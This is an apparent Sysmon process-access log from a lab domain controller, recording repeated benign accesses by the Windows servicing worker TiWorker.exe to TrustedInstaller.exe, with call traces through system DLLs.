13:58:30.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.180{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.180{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.148{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.148{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1